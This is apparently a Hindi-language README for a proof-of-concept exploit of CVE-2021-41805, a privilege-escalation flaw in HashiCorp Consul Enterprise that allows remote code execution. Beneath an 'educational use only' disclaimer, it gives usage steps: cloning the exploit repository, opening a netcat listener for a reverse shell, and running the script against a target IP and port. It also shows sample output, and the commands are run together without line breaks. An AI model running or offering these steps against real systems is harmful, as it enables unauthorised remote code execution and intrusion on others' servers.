
CVE-2021-41805 के लिए एक प्रमाण-अवधारणा जो HashiCorp Consul Enterprise में एक भेद्यता है, जो उन्नत विशेषाधिकारों के साथ रिमोट कोड निष्पादन (RCE) की अनुमति देती है।
[!चेतावनी] कानूनी अस्वीकरण: यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है! पूर्व सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। इस उपकरण का उपयोग करते समय सभी लागू कानूनों का पालन करना उपयोगकर्ता की जिम्मेदारी है। इस उपकरण का डेवलपर कोई देयता नहीं लेता है और इस कार्यक्रम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
एक ACL टोकन (डिफ़ॉल्ट operator:write अनुमतियों के साथ) का उपयोग एक नेमस्पेस में किया जा सकता है ताकि किसी भिन्न नेमस्पेस में अनजाने विशेषाधिकार वृद्धि हो सके। इसका दुरुपयोग बढ़े हुए विशेषाधिकारों के साथ Remote Code Execution (RCE) प्राप्त करने के लिए किया जा सकता है।
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <LISTENER_PORT>python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [वैकल्पिक: -t <ACL टोकन> -v (वर्बोज़) -s (SSL का उपयोग करें)]
बुनियादी तर्कों के साथ एक्सप्लॉइट चलाने पर: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [SSL का उपयोग करें]) मूल आउटपुट इस प्रकार होगा:
[*] PUT अनुरोध सफलतापूर्वक किया गया। अपने लिसनर की जाँच करें...
बुनियादी तर्कों के साथ -v [VERBOSE] जोड़कर एक्सप्लॉइट चलाने पर वर्बोज़ आउटपुट मिलेगा:

यदि एक्सप्लॉइट चलाने पर कोई त्रुटि होती है और -v तर्क निर्दिष्ट किया गया है, तो आउटपुट कुछ इस प्रकार होगा:
